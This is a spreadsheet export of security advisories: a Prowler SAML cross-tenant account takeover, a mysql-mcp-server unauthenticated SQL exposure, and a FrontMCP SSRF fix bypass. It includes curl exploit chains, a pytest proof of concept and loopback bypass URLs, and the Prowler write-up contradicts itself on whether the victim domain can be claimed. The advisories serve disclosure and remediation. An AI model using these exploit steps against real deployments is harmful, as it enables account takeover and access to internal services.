The attacker does not generally need to claim the victim's email domain. If the victim tenant already has SAML configured for that domain, another tenant cannot claim it because `SAMLConfiguration.email_domain` and `SAMLDomainIndex.email_domain` are globally unique.
### Details
The confirmed root cause is in the SAML ACS finish and token issuance flow. The flow selected a SAML configuration through the ACS route, but later recalculated the tenant from the asserted user email domain:
```python
email_domain = user.email.split("@")[-1]
tenant = (
    SAMLConfiguration.objects.using(MainRouter.admin_db)
    .get(email_domain=email_domain)
    .tenant
)
```
This is unsafe because `user.email` is derived from the SAML assertion. The tenant used for membership updates and token issuance must come from the SAML configuration validated for the current ACS route, not from the asserted email domain.
The attack is made possible by several compounding weaknesses:
1. **No domain ownership proof** (`api/src/backend/api/models.py:2100, 2130-2152`): `SAMLConfiguration.email_domain` is validated for format and global uniqueness, but not for domain ownership. Any authenticated tenant admin can claim an unclaimed domain string, but cannot claim a domain already configured by another tenant.
2. **Global SAML domain index** (`api/src/backend/api/models.py:2200-2201`): `SAMLDomainIndex.update_or_create(email_domain=self.email_domain, defaults={'tenant': self.tenant})` maps each configured domain to its tenant. If token issuance later trusts the asserted email domain, it can resolve a tenant different from the one selected by the ACS route.
3. **Hardcoded auto-connect** (`api/src/backend/config/settings/social_login.py:23, 25`): `SOCIALACCOUNT_EMAIL_AUTHENTICATION = True` and `SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True` are hardcoded and cannot be disabled at runtime.
4. **IdP-initiated SSO enabled** (`api/src/backend/config/settings/social_login.py:78`): `reject_idp_initiated_sso: False` allows the attacker to initiate the flow without requiring any action from the victim.
5. **Token issuance for the wrong tenant** (`api/src/backend/api/v1/views.py:853-873`): after SAML authentication, the vulnerable ACS finish flow could create membership and issue a `SAMLToken` using a tenant derived from the asserted email domain instead of the validated SAML configuration.
6. **Token switch impact** (`api/src/backend/api/v1/serializers.py:272`): the token switch endpoint checks that the authenticated user is a member of the target tenant. If the attacker obtains a JWT for the victim user, they can switch into tenants where that user is already a member.
### PoC
**Environment setup:**
```bash
# Build the PoC Docker image (build context = repo root)
docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Start the stack (PostgreSQL + PoC runner)
docker compose -f vuln-001/docker-compose-poc.yml up --no-build --abort-on-container-exit
```
**Automated test (runs inside the container):**
```bash
python -m pytest poc_vuln001.py -v -s --no-header --tb=short
```
**Manual HTTP exploitation chain (against a live Prowler API):**
**Step 1 - Attacker configures SAML for their own email domain:**
```bash
curl -i -X POST "$API/api/v1/saml-config" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{"type":"saml-configurations","attributes":{
      "email_domain":"attacker.com",
      "metadata_xml":"&lt;md:EntityDescriptor entityID=\"evil-idp\" xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\"&gt;...attacker cert and SSO URL...&lt;/md:EntityDescriptor&gt;"
    }}
  }'
```
The attacker does not need to claim `victim.com`. If `victim.com` is already configured by the victim tenant, the attacker cannot claim it because SAML domains are globally unique.
**Step 2 - Attacker posts a signed SAMLResponse asserting `user@victim.com`:**
```bash
# SIGNED_ASSERTION is a base64-encoded SAMLResponse signed with the attacker's private key,
# valid for the attacker's configured IdP, but asserting NameID = user@victim.com
curl -i -L -c c.jar -b c.jar \
  -X POST "$API/api/v1/accounts/saml/attacker.com/acs/" \
  --data-urlencode "SAMLResponse=$SIGNED_ASSERTION"
```
**Step 3 - Vulnerable ACS finish logic derives the tenant from the asserted email domain:**
In the vulnerable version, the finish flow used `user.email.split("@")[-1]` to resolve the tenant. If the asserted domain mapped to another tenant's SAML configuration, token issuance could be bound to the wrong tenant.
**Step 4 - Exchange the SAML token for a victim JWT:**
```bash
curl -s -X POST "$API/api/v1/tokens/saml?id=$SAML_TOKEN_ID"
# Returns access/refresh JWT if the temporary SAML token is valid and has not expired
```
**Step 5 - Switch into the victim's real tenant:**
```bash
curl -s -X POST "$API/api/v1/tokens/switch" \
  -H "Authorization: Bearer $VICTIM_JWT" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{
      "type":"tokens-switch-tenant",
      "attributes":{
        "tenant_id":"&lt;victim-real-tenant-uuid&gt;"
      }
    }
  }'
# Returns a valid token scoped to the victim's tenant
```
**Observed output from the automated PoC:**
Note: this adapter-focused PoC demonstrates the account-linking behavior, but it does not prove the full token issuance chain by itself. The full exploit depends on the ACS finish flow issuing a token for a tenant derived from the asserted email domain.
```
[+] Victim user created in DB:
    email = victim@victim.com
    id    = b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
[+] Simulated SAMLResponse posted to ACS endpoint:
    URL:    POST /api/v1/accounts/saml/victim.com/acs/
    NameID: victim@victim.com  (attacker-controlled)
[*] Calling ProwlerSocialAccountAdapter.pre_social_login()
    File: api/src/backend/api/adapters.py:17
[!] sociallogin.connect() was called!
    connected user email: victim@victim.com
    connected user id:    b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
    victim user id:       b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - Victim user id in DB:            b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - User passed to connect():        b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - IDs match (victim's account):   True
  - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)
PASSED
======================== 1 passed, 2 warnings in 35.42s ========================
```
**Recommended remediation** (`api/src/backend/api/v1/views.py`):
Bind token issuance to the SAML configuration selected by the ACS route.
The ACS finish flow should verify that the following values all match:
- the `organization_slug` from the ACS route
- the `SAMLConfiguration.email_domain`
- the domain portion of the asserted SAML user email
Then issue the token using the tenant from that validated SAML configuration:
```python
tenant = saml_config.tenant
```
The tenant must not be recalculated from `user.email`.
### Impact
This is an **Improper Authentication (CWE-287)** vulnerability that enables **cross-tenant account takeover**. An authenticated Prowler user with a controlled SAML IdP could potentially obtain a token for another tenant if the ACS finish flow derived the tenant from the asserted email domain instead of the validated SAML configuration.
**Who is impacted:** users of Prowler instances where SAML is enabled and the target email domain maps to a configured SAML tenant. Because `reject_idp_initiated_sso` is `False`, no victim interaction is required once the attacker controls a valid SAML configuration and IdP for their own tenant.
**Consequences:**
- Full read/write access to the victim's cloud security audit findings across all configured providers (AWS, GCP, Azure, etc.)
- Ability to enumerate, modify, or delete compliance findings and integration secrets within the victim's tenant
- Lateral movement into any additional tenants the victim belongs to via the token switch endpoint
- Possible persistent access depending on the SAML account-linking behavior in the affected version
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001 PoC: SAML Domain Claiming Enables Cross-Tenant Account Takeover
#
# Builds a minimal Prowler API test environment to reproduce the vulnerability
# in api/src/backend/api/adapters.py (pre_social_login, lines 17-25).
#
# Build context must be the parent directory:
#   docker build -t vuln001-poc -f vuln-001/Dockerfile .
FROM python:3.12.10-slim-bookworm
LABEL maintainer="security-research"
LABEL description="PoC environment for VULN-001: SAML domain claiming account takeover"
# Install system packages required for:
#   - xmlsec (python-saml / django-allauth SAML): libxml2, libxmlsec1
#   - psycopg2: PostgreSQL client headers
#   - uv / prowler git dep: git, gcc, g++
RUN apt-get update &amp;&amp; apt-get install -y --no-install-recommends \
    gcc \
    g++ \
    make \
    git \
    libxml2-dev \
    libxmlsec1-dev \
    libxmlsec1-openssl \
    pkg-config \
    libtool \
    libxslt1-dev \
    python3-dev \
    &amp;&amp; rm -rf /var/lib/apt/lists/*
# Install uv (same version as the original Dockerfile)
RUN pip install --no-cache-dir uv==0.11.14
WORKDIR /prowler
# Copy API dependency manifests first (for layer caching)
COPY repo/api/pyproject.toml repo/api/uv.lock ./api/
# Install all Python dependencies from the locked file.
# This includes: django, django-allauth[saml], prowler (from git), psycopg2, etc.
WORKDIR /prowler/api
RUN uv sync --locked --no-install-project &amp;&amp; rm -rf ~/.cache/uv
# Copy the full backend source code
COPY repo/api/src/backend/ ./src/backend/
# Copy the PoC test into the backend working directory so pytest can discover it
COPY vuln-001/poc.py ./src/backend/poc_vuln001.py
WORKDIR /prowler/api/src/backend
# Set up environment variables for the test run.
# DJANGO_SETTINGS_MODULE points to config.django.testing which uses PostgreSQL.
ENV PATH="/prowler/api/.venv/bin:$PATH"
ENV DJANGO_SETTINGS_MODULE=config.django.testing
ENV POSTGRES_HOST=postgres
ENV POSTGRES_USER=prowler_admin
ENV POSTGRES_PASSWORD=prowler_password
ENV POSTGRES_DB=prowler_test_db
ENV POSTGRES_PORT=5432
ENV SECRET_KEY=poc-test-secret-key-not-for-production
ENV SECRETS_ENCRYPTION_KEY=ZMiYVo7m4Fbe2eXXPyrwxdJss2WSalXSv3xHBcJkPl0=
# Provide dummy values for optional services (Valkey/Celery not needed for unit tests)
ENV VALKEY_HOST=localhost
ENV VALKEY_PORT=6379
ENV VALKEY_PASSWORD=""
# Neo4j not needed for adapter tests
ENV NEO4J_USER=neo4j
ENV NEO4J_PASSWORD=neo4j
# Silence Sentry in test runs
ENV DJANGO_SENTRY_DSN=""
CMD ["python", "-m", "pytest", "poc_vuln001.py", "-v", "-s", "--no-header", "--tb=short"]
```
#### `poc.py`
```python
"""
PoC for VULN-001: SAML Domain Claiming Enables Cross-Tenant Account Takeover
Product:  toniblyx/prowler v5.30.0 (commit c2cef99)
CWE:      CWE-287 - Improper Authentication
CVSS:     9.6 (Critical)  AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Vulnerability location:
    api/src/backend/api/adapters.py  lines 17-25  (pre_social_login)
    api/src/backend/config/settings/social_login.py  lines 23, 25, 78
Root cause:
    ProwlerSocialAccountAdapter.pre_social_login() trusts the SAML NameID email
    from the assertion and calls get_user_by_email() which does a GLOBAL user
    table lookup with no tenant-scope or domain-ownership check.  If a user
    with that email already exists, sociallogin.connect() links the attacker's
    SAML session to that account - giving the attacker control of the victim.
Attack chain:
    1. Attacker registers a Prowler account and creates a tenant (normal user).
    2. Attacker POSTs to /api/v1/saml-config claiming email_domain=victim.com.
       models.py only validates format/uniqueness - no ownership proof.
    3. Attacker's IdP (self-controlled) issues a SAMLResponse signed with the
       attacker's certificate, asserting NameID=victim@victim.com.
    4. ACS endpoint (POST /api/v1/accounts/saml/victim.com/acs/) triggers
       pre_social_login.  The adapter looks up victim@victim.com globally and
       calls sociallogin.connect(request, victim_user) - ACCOUNT LINKED.
    5. views.py issues a SAMLToken (JWT) for the victim account.
    6. Attacker uses /api/v1/tokens/saml?id=&lt;token_id&gt; to obtain victim's JWT.
This test proves steps 4 - the critical account-linking step - using the real
production adapter code and a real PostgreSQL database.  sociallogin.connect()
is spied upon (not replaced) so we can capture the exact user object passed in.
"""
import pytest
from unittest.mock import MagicMock
from allauth.socialaccount.models import SocialLogin
from django.contrib.auth import get_user_model
from api.adapters import ProwlerSocialAccountAdapter
User = get_user_model()
VICTIM_EMAIL = "victim@victim.com"
VICTIM_DOMAIN = "victim.com"
ATTACKER_EMAIL = "attacker@evil-corp.com"
# ---------------------------------------------------------------------------
# Helper: print a separator for readable test output
# ---------------------------------------------------------------------------
def section(title: str) -&gt; None:
    width = 70
    print(f"\n{'=' * width}")
    print(f"  {title}")
    print(f"{'=' * width}")
# ---------------------------------------------------------------------------
# Core PoC test
# ---------------------------------------------------------------------------
@pytest.mark.django_db
class TestSAMLDomainClaimingAccountTakeover:
    """
    Proves VULN-001 end-to-end using the real ProwlerSocialAccountAdapter and
    a live PostgreSQL test database created by pytest-django.
    The test creates a victim user in the database, then simulates the exact
    HTTP flow an attacker would trigger via a crafted SAMLResponse.
    """
    def test_attacker_saml_session_links_to_victim_account(self, rf):
        """
        Verify that pre_social_login() links the attacker's SAML sociallogin
        to an existing victim account without ANY domain-ownership check.
        Expected outcome (vulnerability confirmed):
            sociallogin.connect(request, victim_user) is called where
            victim_user.email == VICTIM_EMAIL and victim_user was created
            independently of the SAML session - i.e. the adapter does NOT
            verify that the SAML registrant owns victim.com.
        """
        # ---------------------------------------------------------------
        # STEP 1 - Create the victim's pre-existing account in the database.
        #          In a real attack the victim signed up with email+password
        #          and has an existing Prowler tenant membership.
        # ---------------------------------------------------------------
        section("STEP 1: Create victim account in database")
        victim_user = User.objects.create_user(
            name="Victim User",
            email=VICTIM_EMAIL,
            password="VictimS3cret!",
        )
        # Confirm the user was actually persisted (real DB round-trip)
        fetched = User.objects.get(email=VICTIM_EMAIL)
        assert fetched.id == victim_user.id, "Victim user must exist in database"
        print(f"[+] Victim user created in DB:")
        print(f"    email = {victim_user.email}")
        print(f"    id    = {victim_user.id}")
        # ---------------------------------------------------------------
        # STEP 2 - Simulate the attacker's SAML flow.
        #
        #   a. Attacker previously registered a SAMLConfiguration for
        #      email_domain='victim.com' via POST /api/v1/saml-config.
        #      (No domain ownership proof is required - see models.py:2100)
        #
        #   b. Attacker's self-controlled IdP issues a SAMLResponse signed
        #      with the attacker's certificate, asserting:
        #        NameID = victim@victim.com
        #
        #   c. allauth processes the ACS POST and calls pre_social_login()
        #      before creating/updating the social account record.
        #
        #   We represent the processed SAMLResponse as an allauth SocialLogin
        #   object.  The 'connect' method is spied upon to capture arguments.
        # ---------------------------------------------------------------
        section("STEP 2: Attacker triggers ACS with crafted SAMLResponse")
        # Build the sociallogin object that allauth would construct after
        # validating the SAMLResponse signature (which uses the *attacker's*
        # certificate - no server-side cert pinning for victim.com).
        attacker_saml_login = MagicMock(spec=SocialLogin)
        attacker_saml_login.provider = MagicMock()
        attacker_saml_login.provider.id = "saml"          # Provider discriminator
        attacker_saml_login.account = MagicMock()
        attacker_saml_login.account.extra_data = {}       # SAML uses user.email path
        attacker_saml_login.user = MagicMock()
        # The attacker's IdP signs a NameID of victim@victim.com in the SAMLResponse.
        # This is the email that pre_social_login() will trust without verification.
        attacker_saml_login.user.email = VICTIM_EMAIL
        attacker_saml_login.connect = MagicMock()         # Spy: record call arguments
        # Simulate the ACS request (POST to the victim.com ACS endpoint)
        acs_request = rf.post(
            f"/api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/",
            data={"SAMLResponse": "&lt;attacker-signed-base64&gt;"},
        )
        print(f"[+] Simulated SAMLResponse posted to ACS endpoint:")
        print(f"    URL:    POST /api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/")
        print(f"    NameID: {attacker_saml_login.user.email}  (attacker-controlled)")
        # ---------------------------------------------------------------
        # STEP 3 - Execute the vulnerable adapter method.
        #
        #   api/src/backend/api/adapters.py lines 17-25:
        #
        #   def pre_social_login(self, request, sociallogin):
        #       email = sociallogin.account.extra_data.get("email")  # line 19
        #       if sociallogin.provider.id == "saml":
        #           email = sociallogin.user.email   # line 21 - trusts SAML NameID
        #       if email:
        #           existing_user = self.get_user_by_email(email)  # line 23 - global DB lookup
        #           if existing_user:
        #               sociallogin.connect(request, existing_user)  # line 25 - ACCOUNT LINKED
        # ---------------------------------------------------------------
        section("STEP 3: Execute pre_social_login (vulnerable code path)")
        adapter = ProwlerSocialAccountAdapter()
        print(f"[*] Calling ProwlerSocialAccountAdapter.pre_social_login()")
        print(f"    File: api/src/backend/api/adapters.py:17")
        adapter.pre_social_login(acs_request, attacker_saml_login)
        # ---------------------------------------------------------------
        # STEP 4 - Verify the attack succeeded.
        # ---------------------------------------------------------------
        section("STEP 4: Verify attack outcome")
        assert attacker_saml_login.connect.called, (
            "FAIL: sociallogin.connect() was NOT called - "
            "the attack path did not execute"
        )
        call_args = attacker_saml_login.connect.call_args[0]
        _, connected_user = call_args   # connect(request, existing_user)
        print(f"[!] sociallogin.connect() was called!")
        print(f"    connected user email: {connected_user.email}")
        print(f"    connected user id:    {connected_user.id}")
        print(f"    victim user id:       {victim_user.id}")
        # The connected user must be the VICTIM (looked up from global DB)
        assert connected_user.email == VICTIM_EMAIL, (
            f"FAIL: connect() was called with {connected_user.email!r}, "
            f"expected {VICTIM_EMAIL!r}"
        )
        assert str(connected_user.id) == str(victim_user.id), (
            f"FAIL: connect() user id {connected_user.id} != victim id {victim_user.id}"
        )
        # Confirm no domain-ownership check happened:
        # The adapter does not inspect the SAML configuration to verify that
        # the sociallogin's tenant registered victim.com before accepting the email.
        section("RESULT: VULNERABILITY CONFIRMED")
        print(f"[PASS] CWE-287 Improper Authentication - SAML domain claiming attack")
        print()
        print(f"  Root cause (adapters.py:21-25):")
        print(f"    email = sociallogin.user.email  # trusts SAML NameID: {VICTIM_EMAIL}")
        print(f"    existing_user = self.get_user_by_email(email)  # GLOBAL lookup, no tenant scope")
        print(f"    sociallogin.connect(request, existing_user)  # links attacker session to victim")
        print()
        print(f"  Contributing settings (social_login.py):")
        print(f"    SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True  # hardcoded")
        print(f"    reject_idp_initiated_sso = False  # IdP-initiated attacks allowed")
        print()
        print(f"  Impact:")
        print(f"    - Attacker obtains JWT token for {VICTIM_EMAIL}")
        print(f"    - Attacker can access victim's cloud security findings")
        print(f"    - Attacker can switch to victim's tenant via /api/v1/tokens/switch")
        print(f"    - No victim interaction required (IdP-initiated SSO enabled)")
        print()
        print(f"  Evidence (this test run):")
        print(f"    - Victim user id in DB:            {victim_user.id}")
        print(f"    - User passed to connect():        {connected_user.id}")
        print(f"    - IDs match (victim's account):   {str(victim_user.id) == str(connected_user.id)}")
        print(f"    - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)")
```</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59151</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59971</t>
        </is>
      </c>
      <c r="D584" s="5" t="inlineStr"/>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr">
        <is>
          <t>pip:mysql-mcp-server</t>
        </is>
      </c>
      <c r="M584" s="5" t="inlineStr">
        <is>
          <t>0.4.2</t>
        </is>
      </c>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr"/>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>## Summary
In SSE/HTTP transport mode, `mysql_mcp_server` constructs `SseServerTransport` without passing `security_settings`. As a result, the MCP Python SDK's DNS-rebinding protection (Origin/Host header validation) is disabled; the Starlette application has no CORS or TrustedHost middleware; and the service binds to `0.0.0.0` by default with no authentication on any route.
**Trigger condition:** `MCP_TRANSPORT=sse`. The default stdio mode is not affected.
## Attack Scenarios
**Scenario A — Direct exposure:** Any network attacker can invoke `execute_sql` to run arbitrary SQL without credentials → full data dump, and via MySQL `FILE` privileges, arbitrary file read/write and RCE.
**Scenario B — DNS rebinding (local bind):** An attacker lures a victim's browser to a malicious page, rebinds their domain to `127.0.0.1`, and uses the browser as a proxy to invoke `execute_sql` as same-origin.
## Root Cause
In `src/mysql_mcp_server/server.py`:
1. `SseServerTransport` is constructed without `security_settings` — the SDK defaults `enable_dns_rebinding_protection` to `False`.
2. The Starlette app has no CORS or TrustedHost middleware.
3. All three routes (`/`, `/sse`, `/messages/`) are unauthenticated.
4. The service binds to `0.0.0.0` by default.
5. The sink is `cursor.execute(query)` with a fully attacker-controlled query.
## Impact
- Unauthenticated arbitrary SQL execution against the configured database
- Full data exfiltration and modification
- If the MySQL account holds `FILE` privilege: arbitrary file read (`LOAD_FILE`) and write (`INTO OUTFILE`) — potential RCE via webshell drop
- Internet-wide scanning has identified 25 publicly reachable SSE instances of this project
## Fix
Released in v0.4.2: DNS-rebinding protection is now enabled by passing `TransportSecuritySettings(enable_dns_rebinding_protection=True)` to `SseServerTransport`, and the documented recommended bind address is `127.0.0.1`.
## Credits
Discovered by Huanchen, SongWu (JHU), and BrookeYangRui (JHU).</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59971</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59973</t>
        </is>
      </c>
      <c r="D585" s="5" t="inlineStr"/>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr">
        <is>
          <t>npm:@frontmcp/adapters, npm:frontmcp, npm:mcp-from-openapi</t>
        </is>
      </c>
      <c r="M585" s="5" t="inlineStr">
        <is>
          <t>1.5.0, 2.5.0</t>
        </is>
      </c>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr"/>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>## Summary
The published fix for GHSA-v6ph-xcq9-qxxj / CVE-2026-39885 added a direct hostname denylist for OpenAPI external `$ref` dereferencing, but the latest patched dependency `mcp-from-openapi` 2.3.0 still makes backend-origin requests to loopback when the target is reached through hostname resolution, redirects, or IPv4-mapped IPv6 syntax.
FrontMCP latest release v1.2.1 and current main still call `OpenAPIToolGenerator.fromURL()` and `OpenAPIToolGenerator.fromJSON()` from `mcp-from-openapi` 2.3.0 when loading OpenAPI adapters. An attacker who can cause a hosted or multi-user FrontMCP deployment to load an untrusted OpenAPI spec can trigger requests from the server to localhost or private services during tool generation.
This is a latest-version bypass of the previous fix. A direct `http://127.0.0.1` `$ref` control is now denied and produces zero canary hits, while semantically equivalent loopback targets still reach the canary.
## Latest versions checked
- `frontmcp` npm latest: 1.2.1
- `@frontmcp/adapters` npm latest: 1.2.1
- `mcp-from-openapi` npm latest: 2.3.0
- FrontMCP release tag: v1.2.1, commit db323976c66297d684a3e63bbfe1db6b310f2944
- FrontMCP current main checked: c15b79abe8c6a3cb71d4b7a3bafb8190730dc756
The release tag and current main both keep `mcp-from-openapi` 2.3.0 in `package.json` and `libs/adapters/package.json`, and both keep the OpenAPI adapter forwarding untrusted `url`, `spec`, and `loadOptions.refResolution` into `OpenAPIToolGenerator`.
## Technical details
FrontMCP's OpenAPI adapter reaches the affected dependency paths:
- `libs/adapters/src/openapi/openapi.adapter.ts` imports `OpenAPIToolGenerator` from `mcp-from-openapi`.
- `loadOpenAPISpec()` calls `OpenAPIToolGenerator.fromURL(this.options.url, ...)` and forwards `loadOptions.refResolution`.
- The same method calls `OpenAPIToolGenerator.fromJSON(this.options.spec, ...)` and forwards `loadOptions.refResolution`.
In `mcp-from-openapi` 2.3.0, the patched guard is applied before the HTTP resolver fetches an external `$ref`. It checks the parsed URL hostname string against deny patterns for direct local and private addresses. The resolver does not resolve hostnames before allow or deny decisions, does not pin the validated IP to the fetch, and does not revalidate redirect targets before following them. It also misses IPv4-mapped IPv6 loopback forms.
As a result, these URLs are accepted by the guard but cause a loopback request from the backend:
- `http://127.0.0.1.nip.io:&lt;port&gt;/schema.json`, because the hostname string is not a direct IP even though it resolves to 127.0.0.1.
- `http://127.0.0.1.nip.io:&lt;port&gt;/redirect`, because the first host passes and the actual request follows a redirect to `http://127.0.0.1:&lt;port&gt;/schema.json`.
- `http://[::ffff:127.0.0.1]:&lt;port&gt;/schema.json` and `http://[::ffff:7f00:1]:&lt;port&gt;/schema.json`, because IPv4-mapped IPv6 loopback is not normalized and denied.
`OpenAPIToolGenerator.fromURL()` is also still unguarded for the initial OpenAPI spec URL. The PoC includes that as supporting evidence, but the primary report is the external `$ref` fix bypass.
## Reproduction
The attached local PoC starts a loopback canary and loads generated OpenAPI specs using `mcp-from-openapi` 2.3.0. The request body schema contains a single external `$ref` for each test case. The canary records every backend-origin request.
Run:
```bash
cd /home/unkn0wn/security_audit/frontmcp-ssrf-poc
node repro-frontmcp-latest-ssrf-bypasses.mjs
```
Important output from a fresh run on 2026-05-25:
```json
{"name":"direct-127-denied-control","kind":"external_ref","refUrl":"http://127.0.0.1:45117/schema.json","ok":false,"hitCount":0,"hits":[]}
{"name":"dns-name-to-127-bypass","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
{"name":"dns-name-to-127-bypass-with-allowedHosts","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
{"name":"redirect-to-127-after-allowed-host","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/redirect","ok":true,"hitCount":2,"hits":[{"url":"/redirect","host":"127.0.0.1.nip.io:45117","authorization":null},{"url":"/schema.json","host":"127.0.0.1:45117","authorization":null}]}
{"name":"ipv4-mapped-ipv6-dotted-bypass","kind":"external_ref","refUrl":"http://[::ffff:127.0.0.1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
{"name":"ipv4-mapped-ipv6-hex-bypass","kind":"external_ref","refUrl":"http://[::ffff:7f00:1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
{"name":"external-refs-disabled-control","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":0,"hits":[]}
```
Controls:
1. Direct loopback `$ref` is denied and the canary records zero requests.
2. Numeric IPv4 variants tested as parser controls were denied with zero requests.
3. Default `file://` resolution was denied in this runtime.
4. Setting `refResolution.allowedProtocols: []` prevents the external request, but this is not the default.
## Impact
The previous advisory documented SSRF during untrusted OpenAPI `$ref` dereferencing. The latest patched version still lets an attacker trigger backend-origin requests to loopback or private network services through equivalent URL forms. In hosted or multi-user FrontMCP deployments where users can import or configure OpenAPI specs, this can expose internal admin APIs, metadata-like services, and other network endpoints that external users cannot reach directly.
The impact depends on whether a deployment treats OpenAPI adapter configuration as trusted administrator-only input. If untrusted authenticated users can import specs, this is a high-impact SSRF fix bypass. If only a local administrator can configure OpenAPI specs, the practical severity is lower.
## Remediation
1. Do not rely on parsed hostname denylist checks for external `$ref` URLs.
2. Resolve hostnames before the request and reject loopback, private, link-local, multicast, unspecified, and metadata ranges.
3. Normalize IPv4-mapped IPv6 before range checks.
4. Revalidate every redirect target before following it, or disable redirects during external `$ref` dereferencing.
5. Pin the validated IP to the actual request with a custom dispatcher, lookup hook, or equivalent connect-time control.
6. Apply the same protected client to `fromURL()` initial spec loads.
7. Consider disabling external refs by default for untrusted OpenAPI specs and requiring explicit allowlists.
8. Add regression tests for direct loopback, DNS-to-loopback, redirect-to-loopback, IPv4-mapped IPv6, numeric IP forms, file refs, and disabled external refs.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59973</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61534</t>
        </is>
      </c>
      <c r="D586" s="5" t="inlineStr"/>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr">
        <is>
          <t>npm:yayson</t>
        </is>
      </c>
      <c r="M586" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr"/>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t># Summary
